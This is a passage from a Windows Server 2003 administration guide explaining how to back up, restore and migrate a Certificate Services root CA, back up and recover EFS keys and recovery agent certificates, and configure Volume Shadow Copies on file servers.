+single root CA at the top and one or more subordinate CAs
+underneath. In a CA hierarchy, the job of the root CA is simpler:
+to issue certificates for subordinate CAs, which then issue other
+certificates directly to users. In either case, the key to holding
+the whole situation together is your root CA. If it goes missing
+or becomes corrupt, then all the certificates issued by the
+hierarchy become invalid, because they can't be validated back
+to the root. So, protecting your root CA is protecting the heart of
+your network's whole system of encrypted communication and
+certificate-based authentication system.
+Backing Up a CA
+The simplest way to back up your root CA is the most
+straightforward: simply use the Backup utility (System Tools
+Accessories) and select the option to back up the System
+State of the machine. This will back up everything on the
+machine that is critical for restoring it, in case a disaster occurs
+and your root CA server is toast. Then, when you rebuild your
+server and restore the System State information from tape, your
+new server will now be the root CA for your enterprise and all the
+certificates that were previously issued by your old machine will
+still be valid.
+To be safe, Microsoft generally recommends that you restore
+your root CA on a machine with hardware that is identical to your
+old machine. But the critical issue here is that your disk layout
+must be similar to the layout of the old machine, especially if
+you stored your certificate database and log files in a
+nonstandard location (by default, they are located in the
+
+%SystemRoot%\system32\CertLog folder, but you can change this
+location when you install Certificate Services). You also have to
+make sure your new server has the same name as the old
+machine, because the name of a CA can't be changed after
+Certificate Services is installed. The name can no longer be
+changed, because the name of the machine is included within the
+root CA's own certificate, so changing its name would cause the
+whole certification-validation process to fail (for a similar
+reason, you can't change the domain membership of a CA
+either).
+However, System State backups are useful only for recovering
+from a complete failure of your server, and other things might go
+wrong with your root CA, such as corruption of the certificate
+database or certificate log files, some unknown problem that
+prevents the Certificate Service from starting and requires you
+to reinstall this service, or the need to move your root CA to a
+different machine on your network (something you might not
+have considered). The reason for the last issue is that
+administrators sometimes don't consider the fact that a root CA
+is designed to last for years or, more likely, for decades. Once
+you've deployed a public key infrastructure (PKI) within your
+organization and started issuing certificates to users for
+encrypted messaging and secure communication, users become
+dependent on the transparency of the whole process from their
+own point of view. The last thing you want to do is build a nice,
+functional PKI system for your network and have to tear it all
+down someday and build another, all because you have to change
+which server hosts the role of root CA.
+To prepare for the eventuality of recovering a corrupted root CA
+(which is still a functioning server, however) or moving the root
+CA role to another server, you need to perform a different kind of
+backup, one that backs up only what's essential for the machine
+to function in that role. Fortunately, Microsoft has made this
+easy by providing a Certification Authority Backup Wizard. Let's
+
+see how this wizard works and what it does.
+Certification Authority Backup Wizard
+The Certification Authority Backup Wizard facilitates backing up
+key data found on your root CA, including the server's own
+digital certificate (called a CA certificate), its private key (used
+for generating digital signatures and decrypting encrypted
+information), the database and associated log files containing
+certificates previously issued by the server, and the queue of
+certificate requests still pending to be processed by the
+machine. This information is sufficient to restore your root CA if
+something is corrupted and the Certificate Service won't work.
+As we'll soon see, however, there's one additional piece of
+information you need to restore this data to a different machine.
+To start the Certification Authority Backup Wizard, open the
+Certification Authority console under Administrative Tools.
+Then, right-click on the node that represents your root CA (or
+the subordinate CA you want to back up in a distributed
+enterprise scenario) and select All Tasks Backup CA to
+start the wizard. The main screen of the wizard offers several
+choices, as shown in Figure 10-3.
+Figure 10-3. Backing up key data for a CA
+
+The first time you back up your CA using this method, be sure to
+at least select the option to back up the private key and CA
+certificate for your CA. This will ensure that you can at least
+restore your CA in the event of an emergency, though if you do
+only this you will still have to reissue certificates to users.
+Therefore, in addition to backing up the private key and CA
+certificate, it's a good idea to also include in your backup the
+issued certificate log and pending certificate request queue for
+your server, which contains information about all certificates
+already issued by your CA and any requests from clients still
+pending. When you choose this option in the Certification
+Authority Backup Wizard screen (shown in Figure 10-3), you
+
+also have the option to perform an incremental backup of your
+CA, which makes a backup of only those changes to the
+certificate database since your last full backup.
+This is trickier than it looks, so let's look deeper at the results
+of the backup process. If you choose only the first option, to
+back up the private key and CA certificate, and specify a folder
+such as C:\certback as the target for your backup, the result of
+the backup will be a file named CA_Name.p12, where CA_Name is the
+name you specified for your CA when you installed the
+Certificate Service on the machine and the *.p12 file extension
+means the file uses standard PKCS #12 cryptographic syntax.
+Since you are required to specify a password later in the wizard,
+this backup file is itself secured by being password-protected.
+Best practice here is to choose a complex, difficult password to
+protect your backup, but make sure you don't forget the
+password; otherwise, you won't be able to restore your root CA
+later.
+If you choose the other option, to back up the issued certificate
+log and pending certificate request queue, a subfolder named
+Database will be created in your certback folder. Inside this
+Database folder, copies of the certificate database files and
+certificate database log files for your CA will be created. The log
+files are basically transaction files that record changes made
+and pending to the database.
+Now, let's say you backed up everythingprivate key, CA
+certificate, certificate log, and queueon Monday, but on Thursday
+you processed a lot of certificate requests from users and now
+need to update the backup. There are two ways you could do
+this. First, you could simply back up everything again to a new
+(empty) folder and then discard your old backupnice and simple.
+The other way (the way recommended by Microsoft) is to make
+an incremental backup of your certificate log and queue, but if
+you try to save your incremental backup in the certback folder,
+
+you get an error saying that you can make backups only to an
+empty folder. In this case, you might then create a subfolder
+under certbackperhaps a folder such as certback\17Nov03, which
+indicates the date you made your incremental backupand then
+back up to this folder instead of certback. The result will be to
+create another folder named DataBase, this one located at
+certback\17Nov03\DataBase. Within this folder, you'll find
+transaction logs but no database. Then, the following week, you
+can perform an incremental backup to a new folder named
+certback\24Nov03, and so on.
+Now, should you ever need to restore your CA from backup, you
+have to restore the full backup first, followed by all your
+incremental backups, in order. That's a lot of work. See why you
+might want to just perform a full backup every time instead?
+By the way, if you're wondering about the grayed-out
+"Configuration information" option in Figure 10-3, that option is
+used only for backing up a standalone CA (i.e., a CA installed on
+a standalone server in a workgroup environment). If you're
+working in an Active Directory environment (which is more
+likely), then the configuration information for your CA is stored
+in Active Directory and therefore doesn't need to be backed up
+separately like this. The nice thing in Windows Server 2003 is
+that this option is not even visible in the wizard when you're
+backing up an enterprise CA (i.e., a CA installed on a domain
+controller or member server in an Active Directory
+environment).
+Restoring a CA to a Working Server
+If your root CA becomes corrupt or your Certificate Services
+fails to start but your server is otherwise working fine, you can
+use your previously created backup to restore the private key,
+
+root CA, certificate database, and transaction logs to their most
+recent working state. Just start the Certification Authority
+console in Administrative Tools, right-click on the root CA node,
+and select Restore CA to open the Certification Authority
+Restore Wizard, which is basically a mirror image of the Backup
+Wizard. If Certificate Services are running, they will be stopped
+temporarily to continue the restore. Select which components
+you want to restore, browse to locate the *.p12 backup file
+created earlier, and enter your password to begin the restore
+process. Once the restore is finished, Certificate Services will
+restart and you should have a working CA again for your
+organization.
+What if it still doesn't work? In that case, you might have a
+corrupt metabase. Internet Information Services (IIS) is a
+supporting component for the CA web enrollment portion of
+Certificate Services, and if the IIS metabase becomes corrupt,
+your CA won't be able to process CA enrollment requests. The
+solution, once you've restored the CA, is to restore the
+metabase as well [Hack #54]. Once the metabase has been
+restored, you should be able to load the Certificate Services web
+pages and process certificate requests again.
+If your root CA still doesn't work, your only solution might be to
+rebuild the machine from scratch and restore System State from
+tape backup media. This is a time-consuming process, but if
+your server is running Windows Server 2003, you might be able
+to speed the process by using the new Automated System
+Recovery [Hack #98] feature of that platform.
+Restoring a CA to a Different Server
+While root CAs are intended to last decades for large
+organizations, the actual hardware platforms they run on become
+
+obsolete in time spans much shorter than the projected lifetime
+of the CA. As a result, you might someday find yourself wanting
+to move the role of root CA from an old machine to a more
+powerful new one. Leaving aside the problem of upgrading the
+operating system itself (who knows what version of Windows
+we'll be running ten years from now?), let's see now how to move
+the root CA role from one server to another, a process usually
+called upgrading your CA.
+First, make a full backup of the private key, CA certificate,
+certificate database, and transaction logs by using the wizard-
+based method described earlier in this hack. The result of the
+backup process is a password-protected file named
+CA_Name.p12 that contains the root CA's own certificate and
+private key, plus a Database folder that contains the database
+files and transaction logs. Then, back up the following Registry
+key on your old root CA:
+HKLM\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\CA_Name
+This key contains critical information about how Certificate
+Services are configured on your machine, and you will need this
+key to move your CA role to a different machine. Make sure you
+also make a note of the location where the certificate database
+and log files are located on your server. By default, they are both
+in the %SystemRoot%\system32\CertLog folder, but you might
+have placed them on a separate drive for increased performance
+when you installed Certificate Services on your old machine.
+Next, you need to prepare your new server to host the role of
+root CA for your organization. Take the server off the network
+and rename it with the same name as the old root CA. This step
+is essential, because the name of the server is included in all
+certificates issued by the CA. So, in order for previously issued
+certificates to be validated, the new root CA must have the
+same name as the old one. While Windows Server 2003 now
+
+supports a process that lets you rename your domains and
+domain controllers, it's obviously simplest if you use a member
+server for your root CA, because member servers are easier to
+rename than domain controllers. Copy the CA_Name.p12 file and
+Database folder from your old machine to a temporary folder
+somewhere on your new machine, and have the Registry key
+exported from the old machine ready for import as well.
+Now, begin installing Certificate Services on your machine by
+using Add/Remove Windows Components (Control Panel
+Add/Remove Programs). When prompted to specify which kind of
+CA you want to install (enterprise or standalone, root or
+subordinate), select "Advanced options" (Windows Server 2003
+replaces "Advanced options" with "Use custom settings to
+generate the key pair and CA certificate instead," but everything
+else is similar) and click Next to display the Public and Private
+Key Pair screen of the Windows Components Wizard, as shown in
+Figure 10-4.
+Figure 10-4. Importing the backed up
+information from your old root CA
+
+Click the Import button, browse to locate the CA_Name.p12
+backup file on your server, and enter the password you specified
+when you backed up your old CA. Complete the remaining steps
+of the wizard, being sure to specify the same path for the
+certificate database and log files that you were using on your old
+CA. Then, restore your database and log files from backup
+discussed in the previous section. Finally, restore the Registry
+key you backed up on the old CA to your new CA.
+
+Restart Certificate Services, and you should now have a working
+root CA running on new hardware that will last you five years?
+Three years? Who knows, the way hardware platforms are
+advancing these days. Just be sure to test your new root CA
+thoroughly in all its aspects (e.g., processing certificate
+requests, validating certificates, and renewing and revoking
+certificates) before finally decommissioning your old root CA!
+Decommissioning the Old CA
+If you still want to use your old server for some other purpose on
+your network (as opposed to discarding it in the big blue bin
+behind your building), then you still have to do two things. First,
+you have to remove Certificate Services from it. But before you
+do this you need to remove the CA certificate and private key
+themselves, because you don't want them kicking around on
+some old machine on your network. To remove these
+cryptographic items, open a command prompt and type certutil
+-shutdown to stop Certificate Services on the machine. Then,
+type certutil -key to display a list of all cryptographic keys
+installed on the machine. Contained within this list should be a
+key named for the CA itself (CA_Name), which you can remove from
+the server by typing certutil -delkey CA_Name (enclose CA_Name in
+quotes if it contains spaces). Now you can use Add/Remove
+Programs in the Control Panel to uninstall Certificate Services,
+allowing you to use your old machine for some other purpose on
+your network.
+But don't forget this second step: rename your server so it won't
+conflict with the new root CA on your network!
+
+Hack 94 Back Up EFS
+Backing up EFS recovery keys is essential if you want to be able
+to recover encrypted documents after a disaster.
+The Encrypting File System (EFS) lets you encrypt files so that
+unauthorized individuals can't read them. Normally, this is a
+good thing, because it helps secure data stored on a machine's
+hard drive. However, this hack is concerned with what happens
+when something goes wrongfor example, if a user's machine
+becomes toast, taking their EFS private key and certificate to
+Never-Never Land.
+The key to being able to recover encrypted files when something
+goes wrong is having a designated recovery agent already in
+place. Then, if you lose your EFS private key, the recovery agent
+can decrypt your encrypted files in an emergency. Every time
+you encrypt a file, EFS generates a unique File Encryption Key
+(FEK) that it uses to encrypt only that file. In other words, each
+encrypted file has its own unique FEK. In addition, the FEK is
+itself encrypted by using your own EFS public key and
+incorporated into the header of the file. Later, if you want to read
+the encrypted file, EFS automatically uses your EFS private key
+to decrypt the FEK for the file and then uses the FEK to decrypt
+the file itself. The FEK is thus used for both encrypting and
+decrypting the file (a process known as symmetric encryption),
+while your EFS public/private key pair is used for encrypting and
+decrypting the FEK (known as asymmetric encryption). This
+combination of symmetric (or secret-key) encryption and
+
+asymmetric (public-key) encryption is the basis of how EFS
+works.
+But what happens if you lose your EFS private key? This might
+happen if your machine has two drives: a system drive (C:) and a
+data drive (D:), where encrypted files are stored. By default, your
+EFS keys are stored on your system drive, so if C: becomes
+corrupted, then the encrypted files on D: will be inaccessible,
+right? That's where the recovery agent comes in. Each time you
+encrypt a file, the FEK is encrypted with both your own EFS
+public key and the EFS public key of the recovery agent. That
+means that the recovery agent can always decrypt the FEK by
+using its EFS private key and thus decrypt the file when
+something goes wrong and your own private key is lost or
+corrupt.
+What are these recovery agents? By default, on standalone
+Windows 2000 machines, the built-in local administrator
+account is designated as a recovery agent, so you can always
+log on as administrator and decrypt any encrypted files stored
+on the machine. You can add other users as recovery agents by
+using the Local Security Policy console, which you can open by
+using Start Run secpol.msc. Then, expand Security
+Settings Public Key Policies Encrypted Data Recovery
+Agents, right-click on that node, and select Add to start the Add
+Recovery Agent Wizard. Any user accounts that already have
+X.509v3 certificates on the machine can then be added as
+recovery agents.
+On standalone Windows Server 2003
+machines, the built-in administrator
+account is not a designated recovery
+agent. In fact, there are no default
+
+recovery agents in Windows Server 2003
+in a workgroup environment. You must
+designate an account for this role.
+In a domain environment, things are a little different. The built-in
+domain administrator account is the default recovery agent for
+all machines in the domain, and you can specify additional
+recovery agents by using Group Policy. Open the Group Policy
+Object (GPO) for the domain, OU, or site in which the intended
+recovery agent account resides, and navigate to Computer
+Configuration Windows Settings Security Settings
+Public Key Policies Encrypted Data Recovery Agents.
+Right-click on this node and select Add to start the same Add
+Recovery Agent Wizard as before, but this time browse the
+directory to locate the account you want to add.
+Once Group Policy refreshes, your new recovery agent will be
+able to decrypt files encrypted by other users, but only if the
+users encrypt the file after the new recovery agent was
+designated. This is because files encrypted previously have no
+information about this new recovery agent in their headers and
+therefore can't be decrypted yet by the new recovery agent.
+Fortunately, if the user who encrypted a file simply opens and
+then closes the file, this alone is sufficient for EFS to add the
+new recovery agent to the encrypted file's header. The moral of
+the story is that you should think before you implement EFS, and
+designate recovery agents before you allow users to start
+
+encrypting files. Otherwise, you might find yourself sending out
+an unusual email to everyone saying, "Please open and then
+close all files you have encrypted on your machines" or
+something similar.
+Backing Up Encrypted Data and EFS Keys
+Backing up files that have been encrypted using EFS is easy:
+simply use the Backup utility to back them up like any other files
+you would back up. What's really important is that you also back
+up the EFS certificate and public/private key pair for each user
+who stores data on the machine. Since EFS is implemented on a
+per-user basis, this means you have to back up this information
+for each user individually. However, this information is stored in
+the user profile for each user, which means that simply by
+backing up user profiles you also back up their EFS certificate
+and keys. More specifically, a user's EFS private key is stored in
+the \Application Data\Microsoft\Crypto\RSA subfolder within that
+user's profile, while the user's EFS public key certificate and
+public key are stored in the \Application
+Data\Microsoft\SystemCertificates\My Certificates\My folder under
+the subfolders \Certificates and \Keys.
+You can back up users' EFS certificates and key pairs as part of
+your regular backup program and, if you have roaming user
+profiles configured, you can do this centrally from the file server
+where such profiles are stored. If you don't have roaming profiles
+implemented and users store important documents on their own
+machines, it might be necessary to have users back up their own
+profiles locally by using Backup to back up to file instead of
+tape. Unfortunately, this guards against profile corruption only,
+and it might not help if a disk failure causes the backed-up
+profile to be lost as well. A better alternative is to have users
+
+export their EFS certificate and private key to a floppy and have
+them store it somewhere safe. That way, if their system drive
+crashes, they can still decrypt information on their data drive by
+importing their previously exported EFS certificate and private
+key.
+The steps to export a user's EFS certificate and private key are
+fortunately quite straightforward and can be done easily by any
+user. Simply open Internet Explorer, select Tools Internet
+Options, switch to the Content tab, click the Certificates button,
+and select the Personal tab, as shown in Figure 10-5.
+Figure 10-5. Exporting the EFS certificate and
+private key for user jsmith
+
+Then, select the certificate you want to export (the correct
+certificate will display "Encrypting File System" beneath
+"Certificate intended purposes," near the bottom of the
+properties page) and click Export to begin the Certificate Export
+Wizard. Choose the option to include the user's private key in
+the export (the public key is automatically included in the
+certificate), specify a password to protect your export file, and
+choose a name and destination for your export file. As
+mentioned previously, users will typically export their EFS keys
+to a floppy, but you could burn them to a CD or even store them
+on a secure network share if you prefer. The important thing is,
+
+wherever you export this information, keep it safe so that no one
+except the user and trusted administrators can access it.
+Anyone who gets their hands on the export file and cracks the
+password can use it to decrypt any encrypted files they have
+access to.
+The result of this export process will be a *.pfx file (called a
+Personal Information Exchange file), located in the target folder or
+media. Then, if the user's EFS keys later become corrupted and
+the need arises to reinstall these keys, this can be done either
+by repeating the previous process (but clicking Import instead
+of Export in Figure 10-5) or more simply by double-clicking on
+the .pfx file itself to start the Certificate Import Wizard. This
+wizard is smart enough to figure out that the EFS certificate and
+private key stored in the .pfx file should be imported into the
+user's personal certificate store.
+An interesting option to consider when exporting a user's EFS
+certificate and private key is to delete the user's private key
+from his profile during the process. This option is labeled
+"Delete the private key if the export is successful" and is found
+on the penultimate page of the Certificate Export Wizard. If you
+choose this option, you'll be able to encrypt files by using EFS,
+but you won't be able to decrypt them unless you supply the
+private key on some mediumsomething that might be an option
+to consider in a high security environment.
+Restoring EFS Keys
+If a user's EFS private key becomes corrupted or lost and the
+user hasn't backed up the key to a floppy as described in the
+previous section, then it's time for the recovery agent to step in.
+On a standalone machine, you can simply log on using the built-
+in administrator account, locate the encrypted folders the user
+
+can no longer access in Windows Explorer, right-click on each
+folder, select Properties, click Advanced, and clear the "Encrypt
+contents to secure data" checkbox for each folder. This decrypts
+the files within the folders and enables the user to read them
+again.
+In a domain environment, you typically don't want to log on to a
+user's machine as a domain administrator and see a local user
+profile being created for your account as a result. Instead,
+simply instruct the user to use the Backup utility to back up to
+file any encrypted volumes or folders on her machine. The
+resulting backup file (*.bkf file) processes files it backs up as a
+data stream and preserves their encrypted status. Then, have
+the user copy her .bkf file to a network share where you as
+domain administrator can access the backup file, restore it to
+another folder, decrypt any files the user needs, and copy these
+files to the share where the user can access them.
+While this is the most common solution, there's another
+approach that's worth considering: unite the user with his EFS
+keys again. Even if the user hasn't previously exported his keys
+to a floppy for safekeeping, chances are, in a domain
+environment, that you make regular backups of user's profiles
+(assuming roaming profiles are enabled). By simply restoring a
+user's profile from backup you restore his EFS certificate and
+keys, allowing him to read his encrypted files again. Then, tell
+him politely but firmly to immediately export his certificate and
+keys to a floppy, because you don't want to have to go through
+this again!
+If EFS is being used to encrypt files on a file server where
+multiple users store their files, then this process can be
+complicated if you've designated different recovery agents for
+different groups of users. In particular, you might need to
+determine which recovery agents are designated for any
+encrypted files that users can no longer access. To do this, you
+
+can use the efsinfo command-line utility included in the
+Windows 2000 Server Resource Kit. This handy little utility can
+tell you who originally encrypted a file and who the designated
+recovery agents for the file are. Just type efsinfo /r /u filename,
+where filename includes the path to the encrypted file. Once you
+know any recovery agent for the file, you can proceed to decrypt
+it as shown previously.
+What if the individual who can't access her encrypted files is
+your boss and she needs access to her files immediately?
+Export your own EFS certificate and private key to floppy as a
+domain administrator or other recovery agent, walk the floppy
+over to your boss's office, insert the floppy into her machine,
+import the certificate and private key, and decrypt her files.
+Then, delete the certificate and key from her machine. When she
+tries to encrypt a file again, a new EFS certificate and private
+key will automatically be generated. Smile, because you've
+acted like Superman, and send her an email later asking for a
+raise.
+But what if your own EFS certificate and private key as domain
+administrator or recovery agent is lost or corrupt?
+Backing Up Recovery Agent Keys
+Obviously, it's a good idea for administrators and other recovery
+agents to also make backup copies of their own EFS certificates
+and private keys. Otherwise, a point of failure exists in this
+whole recovery process and users' encrypted files could be lost
+forever and unrecoverable.
+If you're operating in a workgroup environment, recall that the
+built-in local administrator account is the default recovery agent
+in Windows 2000. This means you have to back up the EFS
+
+certificate and private key of the administrator account, so log
+on to the machine using this account and use Start Run
+secpol to open Local Security Policy as before. Select the
+Encrypted Data Recovery Agents node under Public Key
+Policies in the left pane, right-click the EFS certificate in the
+right pane, and select All Tasks Export to start the
+Certificate Export Wizard. Choose the option to export the
+private key as well, specify a password to protect the export file,
+and specify a name and destination for exporting the
+informationtypically, some form of removable media, such as a
+floppy. Keep that floppy safe.
+In a domain environment, the built-in domain administrator
+account is the default recovery agent and the EFS certificate
+and private key are located on the first domain controller in the
+domain (the one that created the domain when you ran dcpromo on
+it). Log onto this machine using that account, use Start Run
+dompol.msc to open the Domain Security Policy, select
+Encrypted Data Recovery Agents in the left pane, right-click the
+EFS certificate in the right pane, again select All Tasks
+Export to start the Certificate Export Wizard, and proceed as
+before. If you are not given the option to export the private key,
+you might not be logged onto the right domain controller, so
+change machines and try again.
+Another method for exporting certificates and keys is to use the
+Certificates snap-in. Open a blank MMC console, add this snap-
+in while logged on as administrator, expand Certificates -
+Current User Personal Certificates, and find the
+certificate you want to back up by looking under the Intended
+Purposes column, as shown in Figure 10-6. The power of this
+approach is that you can also use it to back up and restore other
+sorts of certificates and keys, including EFS keys.
+
+Figure 10-6. Using the Certificates snap-in to
+back up a recovery agent key
+Now that you've backed up your recovery agent's EFS certificate
+and keys, you're ready for the worstunless your dog eats your
+floppy!
+
+Hack 95 Work with Shadow Copies
+Shadow copies are a new feature of Windows Server 2003 that
+lets you save point-in-time copies of your filesan excellent
+complement (but not a replacement) for your regular backup
+plan.
+Windows Server 2003 includes a new feature called the Volume
+Shadow Copy Service (VSS) that can save administrators time
+when users are concerned. When shadow copies are enabled on
+an NTFS volume, Windows makes point-in-time shadow copies
+(or snapshots) of files on the volume at predefined intervals.
+Users can then access these shadow copies to recover
+accidentally deleted or overwritten files without requiring the
+administrator to intervene to restore these files from backup
+media. This feature also allows users to compare current
+versions of documents with previous versions, to check for
+differences without requiring that users actually save separate
+versions of these documents along the way. Either way,
+administrators are freed from the hassle of responding to users'
+requests for restoring their files from backups, and any time
+gained nowadays for the harried network administrator is an
+asset.
+On the other hand, implementing shadow copies on file servers
+is not a replacement for a regular backup program, because
+shadow copies are stored on disk in the same way the original
+files are stored. So, if a disk goes on your file server, it could
+mean that both the original files and shadow copies might be
+
+gone, depending on how you've configured your file server. Also,
+shadow copies are read-only copies and can't be edited directly.
+In fact, a shadow copy of a file isn't really a file at all; it's a
+block-by-block record of changes that were made to the file
+since the last shadow copy was made. So, to protect your
+business from data loss, be sure to combine shadow copies with
+regular tape backups using the Windows Backup utility or some
+third-party product.
+Implementing Shadow Copies
+Like most successful IT initiatives, implementing shadow copies
+starts with good planning. Disk space considerations are a good
+place to start, since shadow copies require a minimum of 100
+MB of free space for each volume on which you enable them.
+That minimum can also grow quickly, depending on how actively
+users modify their files and how aggressively you've scheduled
+shadow copies to occur. In fact, even if you only have a few
+kilobytes of files on your file server, the first time a shadow copy
+of a volume is made, it takes up the full 100 MB space allocated
+to this feature.
+By default, the maximum amount of disk space used for
+shadowing a volume is 10% of the size of that volume. So, if you
+shadow a 20 GB data volume on your file server, up to 2 GB of
+space will be needed to store the shadow copies of files on this
+volume. However, if the need arises, you can increase this
+maximum at any time. This is important, because if the
+maximum is reached, then shadow copies start dropping the
+oldest versions to make room for the new.
+
+If this 10% limit reminds you of the
+default settings for Recycle Bin, you're
+right. Shadow copies are designed to
+function as a kind of network-enabled
+recycle bin for your users. In other words,
+if you enable shadow copies on a volume,
+any shared folders on the volume
+automatically save point-in-time versions
+of documents in these shares. Actually, it
+would be nice if the Recycle Bin
+automatically did that locally as well.
+(Perhaps in Longhorn?)
+One planning option to consider seriously is to store shadow
+copies on a different volume than the one where users' data files
+reside, preferably on a different physical drive as well. That way,
+you can plan separate disk-space needs for original files and
+their copies. However, many administrators don't realize that if
+you discover later that your shadow volume is insufficient and
+you want to move the shadow copies to a different volume, doing
+so causes you to lose all shadow copies of user files. Backing up
+the shadow volume in this case and restoring it to the new
+volume won't work, because VSS can't be configured manually to
+find its copies in a moved location. To work around this problem,
+you can store your shadow copies on a dynamic volume, which
+you can extend later by adding free disk space on the same
+drive or another drive.
+Also remember that shadow copies are enabled on a per-volume
+basis. So, when you enable this feature on a data volume, all
+shared folders on that volume will have shadow copies created
+
+for files within them. This is an important issue that is usually
+not considered in the planning stage. In fact, this issue should
+actually be considered before you even set up your file server in
+the first place. In other words, to implement shadow copies
+effectively, you need to ensure that shared folders on your file
+server are grouped together appropriately onto separate
+volumes, according to the level of user activity for those shares.
+Group together shares within which users frequently modify files
+according to how often they modify them: high-activity shares
+on one volume, medium activity on another, low activity on a
+third. This will help you plan separate shadow-copy schedules
+for each volume: frequent copies for high-activity volumes and
+infrequent copies for low-activity volumes. If you are planning on
+upgrading your Windows 2000 file servers to Windows Server
+2003, consider reorganizing the volumes and shares on your
+servers as part of the upgrade process.
+Configuring shadow copies is basically a three-step process:
+configure it on the server, configure it on the client, and educate
+users how to use it. The last step is often forgotten from the IT
+perspective, because it's not strictly in the "techie" realm of
+things, but it's just as important as the other two steps. For
+increased security, shadow copies are disabled on all NTFS
+volumes until you enable them on the server. If you're logged on
+locally, the easiest way to enable shadow copies is to right-click
+on any volume, select Properties, switch to the Shadow Copies
+tab, select the volume on which you want to enable shadow
+copies, and click Enable (see Figure 10-7).
+Figure 10-7. Enabling shadow copies on a
+volume
+
+Actually, before you enable this feature on a volume, it's a good
+idea to first review the default settings for shadow copies by
+clicking on the Settings button shown in Figure 10-7. The
+
+default settings store the shadow copies on the same volume as
+the one you are enabling, use up to 10% of the volume to store
+copies, and make new shadow copies of files every weekday
+(Monday through Friday) at 7 a.m. and noon. The rationale
+behind the schedule is to save copies before users arrive at
+work (when they open their files) and around lunchtime (when
+they are halfway through their workday).
+You can create almost any schedule you want for when shadow
+copies should occur, but avoid scheduling it to occur too often
+(e.g., once an hour), due to the excessive load it will place on
+your server. When planning your schedule, also remember that
+shadow copies will save a maximum of 64 different versions of a
+file before deleting older versions to make room for new
+versions. So, if you leave the default twice-a-day schedule in
+place, users will be able to restore a version up to 32 days old.
+Anything older than that you'll have to restore from backup for
+them.
+Be sure to clearly communicate to users your schedule of when
+shadow copies will be made so that they don't rely on this
+feature excessively. Users should still consider themselves
+responsible for making versioned copies of files they work on
+and should view shadow copies only as a tool of last resortjust in
+case they accidentally delete a file or overwrite itrather than
+something they'll use to save versions of their work. As
+administrator, you can also force a shadow copy to occur at any
+time; just select the volume and click the Create Now button
+shown in Figure 10-7. This can be a useful feature if there are
+certain times when user activity is high, such as year-end
+finalization of budgets. Instead of modifying your schedule, you
+could manually create an extra shadow copy or two during the
+days just before the deadline.
+You might be wondering where shadow copies are stored on a
+volume. If you create a new 5,000 MB data volume E:, enable
+
+shadow copies on the volume, and click Create Now to generate
+shadow copies immediately (even though there are not files yet
+on your volume), then, when you select the E: drive in My
+Computer, you should see around 4,900 MB of free space. In
+other words, shadow copies immediately use the minimum 100
+MB allocated to it the first time they operate. But your drive is
+still empty when you open it in Windows Explorer. If you use
+Tools Folder Options View to show hidden files and
+unhide hidden system files, you'll see a folder named System
+Volume Information that has System and Hidden attributes
+enabled; that's where your shadow copies are all stored. This
+volume is accessible only to the built-in system account on your
+server, not to administrators.
+Once you've reviewed and modified the shadow-copy settings
+for a volume and enabled shadow copies on that volume, your
+server begins to save shadow copies of all files stored on the
+volume. That includes all files, not just ones in shared folders on
+the volume. In other words, even if you modify a file locally on
+the volume and the file is stored in a folder that isn't shared, a
+shadow copy will still be created for that file. That way, if you
+later decide to share the folder for others to access, a history of
+versions of files in the folder will be displayed.
+In a network environment, where it's not convenient to log on
+locally to your file server, you can still enable shadow copies by
+using Computer Management. Just open Computer Management
+on your administrator workstation, connect to the remote file
+server, right-click on the Shared Folders node, and select All
+Tasks Configure Shadow Copies.
+This works only from workstations running
+Windows XP Professional with Service
+
+Pack 1 and the Windows Server 2003
+Administration Tools Pack or, alternatively,
+from another machine that is running
+Windows Server 2003.
+Once shadow copies are enabled on the server, they still have to
+be enabled on the users' client computers. By default, only
+Windows Server 2003 has shadow-copy functionality built right
+into it; all previous versions of Windows require that special
+client software be installed on them before users can use this
+feature to access previous versions of files. If your desktop
+computers are running Windows XP Professional (the desktop
+operating system that most closely integrates with Windows
+Server 2003 on the back end), you can install shadow client
+software on them easily. Just share the
+%Systemroot%\System32\clients\twclient\x86 folder on your
+server, and then instruct users to connect to this share and
+double-click on twcli32.msi to run the Windows Installer File.
+Alternatively, you could use the software-installation feature of
+Group Policy to deploy this feature automatically to all desktop
+machines in an organizational unit, domain, or site. You could
+even email the installer file to your users, along with instructions
+on how to install and use it.
+If your desktops are running Windows 2000 Professional (with
+Service Pack 3 or later) or Windows 98 Second Edition (SE), you
+need to download a different shadow-software client from the
+Microsoft Windows Download Center
+(http://www.microsoft.com/downloads/) and deploy it by using
+one of the methods described previously (you also have to
+
+install the same client software on the server). If your desktops
+are running Windows NT 4.0 Workstation or Windows Millennium
+Edition (ME), then you're out of luck.
+Using Shadow Copies
+Let's say you've enabled shadow copies on volume E: on a
+Windows Server 2003 file server, and this volume is used to
+store users' files in a series of shares named Budgets, Projects,
+and so on. How can a user access previous versions of her files
+in these shares, and what actions can she perform on them? Say
+a user uses Start Run \\servername\budgets, where
+servername is the name of the file server where the Budgets share
+is located. This will open a window on the user's desktop,
+displaying all files stored in that share.
+Users can right-click on a particular file in that share, select
+Properties, and switch to the Previous Versions tab shown in
+Figure 10-8. If this tab is missing, then the user's computer
+doesn't have the shadow-copy client software installed.
+Figure 10-8. Accessing previous versions of a
+file using shadow copy client software
+
+All previous point-in-time versions of the selected file are
+displayed in this tab (if no previous versions are displayed, the
+file hasn't been modified since it was created). The View, Copy,
+and Restore buttons enable the user to perform different tasks
+with these versions. For example, to view the contents of a
+previous version, click View. This is helpful when you're not sure
+which previous version is the one in which you wrote that lovely
+paragraph but later deleted in a fit of writer's despair. Once
+you've found the previous version of the file you want, you could
+save it to your My Documents folder and give it a descriptive
+name.
+Alternatively, if you already know which version you're
+interested in (such as the most recent previous version) you
+
+could click Copy to copy that version to a different location. If
+you're really confident, you could click Restore to overwrite the
+current version of the file (the one you're working with as a user)
+with the previous version specified.
+If you're not even sure which file had that wonderful paragraph
+you wrote, but you know it's in the Budgets share, you could
+right-click on an empty area within the open share window,
+select Properties, and switch to the Previous Versions tab of the
+share itself. This displays all previous shadow copies made of
+that share and lets you view previous versions of individual files
+within the share, copy a previous version of all files in the share
+to another location, or roll back all files in the share to the
+specified previous version.
+The bottom line is, when educating users on how to use shadow
+copies, tell them to ignore the Restore button and always use
+View and Copy instead. One user carelessly restoring an entire
+shared folder to its previous version could result in lost work and
+its accompanying frustration for other users who have access to
+the same share. Of course, if users work only with their own files
+but store them in the same share, this might not be an issue,
+depending on how NTFS permissions are configured on the
+shared folder. But if users have collaborative access to a
+document, problems can result when using shadow copies. Of
+course, such problems can result even without shadow copies
+functionality.
